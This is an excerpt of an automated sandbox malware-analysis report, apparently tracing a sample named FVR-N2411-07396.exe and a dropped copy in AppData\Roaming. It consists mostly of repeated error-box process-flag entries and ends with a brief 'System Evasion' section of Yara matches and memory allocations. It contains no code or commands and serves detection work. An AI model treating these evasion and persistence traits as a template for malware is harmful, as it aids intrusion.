                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: FVR-N2411-07396.exe PID: 2668, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeMemory allocated: 49E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeMemory allocated: 8B80000 memory reserve | memory write watchJump to behavior
